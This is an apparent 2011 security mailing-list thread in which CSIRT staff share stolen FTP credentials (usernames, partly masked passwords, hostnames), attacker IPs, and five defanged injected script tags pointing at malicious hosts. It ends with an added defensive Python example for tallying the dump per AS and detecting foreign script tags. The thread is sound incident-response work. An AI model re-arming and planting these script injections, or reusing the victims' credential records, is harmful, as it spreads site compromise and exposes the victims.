[nsp-sec] Stolen FTP credentials
Carles Fragoso
cfragoso at cesicat.cat
Wed Apr 20 06:29:03 EDT 2011
Good morning,
I have feedback from some of the victims that allowed us to share following information.
Some websites were accessed and modified to include following injections:
1 <sXXcript type="text/javascript" src="hXXp://www.saglikalemi.com/js.php"></sXXcript>
2 <sXXcript type="text/javascript" src="hXXp://shatrappz.com/search.php"></sXXcript>
3 <sXXcript type="text/javascript" src="hXXp://www.zintec.be/js.php"></sXXcript>
4 <sXXcript type="text/javascript" src="hXXp://xsellence.com/search.php"></sXXcript>
5 <sXXcript type="text/javascript" src="hXXp://carmenotokiralama.com/counter.php"></sXXcript>
If we perform a simple GET request, 1, 3 and 4 return 404 (Not Found), 2 returns obfuscated JavaScript, and 5 doesn't return an error but just returns the string "?>" (maybe it is expecting a proper User-Agent or something else).
Victim websites were accessed from following IPs (* = matched on a lot of domains)
41.226.17.45 AGENCE TUNISIENNE INTERNET AS2609
46.252.128.63 LV RELIKTBVK AS52055 (*)
46.161.24.102 RU TARAKANOVDA AS44050 (*)
114.91.27.93 CN CHINANET SHANGAI AS4812
62.78.39.124 RU WELLCOM AS50289
62.78.36.202 RU WELLCOM AS50289
62.78.43.98 RU RU-WELLCOM AS50289
Hope it helps. Does anyone have more feedback about this incident?
-- Carlos
On Apr 20, 2011, at 11:19 AM, Carles Fragoso wrote:
Thomas,
We have already taken care of the credentials related to the .CAT TLD as they are within our constituency ...
766 | 193.144.12.25 | ES | webquest.udl.cat | sanuy | s4****** | REDIRIS RedIRIS Autonomous System
43988 | 94.127.190.29 | ES | ftp.relojes.cat | rellotges | 42****** | ABSERVER-AS Access Basic Server S.L.
43988 | 94.127.190.29 | ES | www.oliolivaartesa.cat | oli | 42****** | ABSERVER-AS Access Basic Server S.L.
... but we have also proxified those to trusted peers at ES (Spanish) autonomous systems. See (*) for those already contacted.
114 16371 | ACENS_AS acens technologies (*)
46 43988 | ABSERVER-AS Access Basic Server S.L. (*)
28 3352 | TELEFONICA-DATA-ESPANA Internet Access Network of TDE (*)
22 20718 | AS_ARSYS-EURO-1 arsys.es (*)
11 50926 | INFORTELECOM-AS Infortelecom Hosting, S.L. (*)
6 196834 | SOFTEC_INTERNET Softec Internet, S.L.
5 13287 | NIXVAL NIXVAL Data Center
4 16338 | ONO-AS2 Cableuropa - ONO (*)
3 6739 | ONO-AS Cableuropa - ONO (*)
3 44497 | REDCORUNA-AS REDCORUNA
3 15699 | AS_ADAM Network ADAM DATACENTER - www.adamdatacenter.es
2 42237 | INTERDOMINIOS Grupo Interdominios S.A. (*)
2 196713 | ABANSYS_AND_HOSTYTEC-AS Abansys & Hostytec, S.L. (*)
2 15704 | AS15704 Xtra Telecom, S.L.
2 12769 | IBER-X LET_S GOWEX, S.A.
2 12386 | ASALPI Orange Catalunya Xarxes de Telecomunicacions S.A. (*)
1 8311 | REDESTEL Redestel Networks S.L.
1 5400 | BT BT European Backbone
1 42745 | ARI Ari Business Solutions, S.A.
1 3324 | FUJITSU TECHNOLOGY SOLUTIONS, S.A.
1 31082 | MCCTELECOM-AS MCCTELECOM
1 25487 | DIGITALVALUE-AS Digital Value Autonomous System, Valencia (Spain)
1 2134 | GSVNET-AS GS Virtual Network
1 20838 | YIF-AS France Telecom Espana S.A
1 15919 | INTERHOST Interhost AS
1 12715 | JAZZNET Jazz Telecom S.A.
1 12479 | UNI2-AS France Telecom Espana SA (*)
1 12334 | AS R Cable y Telecomunicaciones Galicia S.A.
I am waiting for feedback from them to see if the credentials have already been abused and what the impact is.
Keep up the good work. :)
-- Carlos Fragoso
On Apr 19, 2011, at 10:08 AM, Thomas Hungenberg wrote:
Please find below a list of stolen FTP login credentials found in several lists
on a server used for malicious activity. Unfortunately, I don't have information
on when and how the credentials were stolen, but the filenames and timestamps
of the lists indicate that they were harvested earlier this month.
Format: ASN | IP | CC | hostname | username | sanitized password | AS desc
- Thomas
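The two operational steps the thread describes, splitting Thomas's dump per AS so each peer can be notified (the "count ASN | AS desc" table Carles posted) and checking a victim page for injected foreign script tags, as an added Python example. This is not code from any of the posts. The dump lines and the HTML page below are constructed for the example (invented hostnames, usernames, passwords, a made-up DE line, and an invented script host evil.example.net standing in for the hosts listed above); the allowlist of the site's own hosts is an assumption a handler would supply per victim.

```python
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample of the dump format Thomas describes:
#   ASN | IP | CC | hostname | username | sanitized password | AS desc
# Hostnames, usernames, passwords and the non-ES line are invented for this example.
SAMPLE_DUMP = """\
766 | 193.144.12.25 | ES | webquest.example.cat | user1 | s4****** | REDIRIS RedIRIS Autonomous System
43988 | 94.127.190.29 | ES | ftp.example-a.cat | user2 | 42****** | ABSERVER-AS Access Basic Server S.L.
43988 | 94.127.190.29 | ES | www.example-b.cat | user3 | 42****** | ABSERVER-AS Access Basic Server S.L.
16371 | 192.0.2.10 | ES | www.example-c.es | user4 | pw****** | ACENS_AS acens technologies
16371 | 192.0.2.11 | ES | shop.example-d.es | user5 | pw****** | ACENS_AS acens technologies
16371 | 192.0.2.12 | ES | blog.example-e.es | user6 | pw****** | ACENS_AS acens technologies
3320 | 198.51.100.7 | DE | www.example-f.de | user7 | pw****** | DTAG Deutsche Telekom AG
this line is malformed and must be skipped, not crash the parser
"""

FIELDS = ("asn", "ip", "cc", "hostname", "username", "password", "as_desc")


def parse_dump(text: str) -> List[Dict[str, str]]:
    """Parse the pipe-separated list; lines without exactly 7 fields or a numeric ASN are skipped."""
    records = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|")]
        if len(parts) != len(FIELDS) or not parts[0].isdigit():
            continue
        records.append(dict(zip(FIELDS, parts)))
    return records


def count_by_asn(records: Iterable[Dict[str, str]], cc: Optional[str] = None) -> List[Tuple[int, str, str]]:
    """(count, ASN, AS description) per AS, most-affected first, optionally restricted to one country code."""
    counter = Counter(
        (r["asn"], r["as_desc"]) for r in records if cc is None or r["cc"] == cc
    )
    rows = [(n, asn, desc) for (asn, desc), n in counter.items()]
    return sorted(rows, key=lambda row: (-row[0], int(row[1])))


def format_peer_table(rows: Iterable[Tuple[int, str, str]]) -> str:
    """Render rows in the '<count> <ASN> | <AS desc>' layout used for the peer list in the thread."""
    return "\n".join(f"{n} {asn} | {desc}" for n, asn, desc in rows)


# Constructed victim page: one local script, one from the site's own CDN, one injected foreign script.
# evil.example.net is an invented host standing in for the script hosts listed in the thread.
SAMPLE_PAGE = """<html><head>
<script src="/assets/app.js"></script>
<SCRIPT type="text/javascript" src='//cdn.victim.example/jquery.js'></SCRIPT>
</head><body><p>hello</p>
<script type="text/javascript" src="http://evil.example.net/js.php"></script>
</body></html>"""

# src= attribute of a <script> tag; the lookbehind keeps data-src= and similar from matching.
SCRIPT_SRC_RE = re.compile(
    r"<script\b[^>]*?(?<![\w-])src\s*=\s*[\"']([^\"']+)[\"']", re.IGNORECASE
)


def find_injected_scripts(html: str, own_hosts: Iterable[str]) -> List[str]:
    """Return script src URLs whose host is neither the site itself nor one of own_hosts (known CDNs etc.)."""
    allowed = {h.lower() for h in own_hosts}
    hits = []
    for src in SCRIPT_SRC_RE.findall(html):
        host = urlsplit(src).hostname  # None for relative paths such as /assets/app.js
        if host is not None and host.lower() not in allowed:
            hits.append(src)
    return hits


def defang(url: str) -> str:
    """Defang http(s) URLs the way the thread does (hXXp://) so they can be pasted into a report safely."""
    return re.sub(r"^http(s?)://", r"hXXp\1://", url, flags=re.IGNORECASE)


if __name__ == "__main__":
    records = parse_dump(SAMPLE_DUMP)
    print(format_peer_table(count_by_asn(records, cc="ES")))
    for src in find_injected_scripts(SAMPLE_PAGE, {"www.victim.example", "cdn.victim.example"}):
        print("injected:", defang(src))
```

The per-AS table is what a CSIRT actually mails to each peer, so the parser tolerates junk lines rather than aborting on them, and the country filter mirrors the "ES only" split in the thread. The script check flags every external host not on the site's own allowlist, not just the five hosts seen so far, since the injected URLs change between victims; the User-Agent-dependent "?>" response noted above cannot be reproduced offline and is left out.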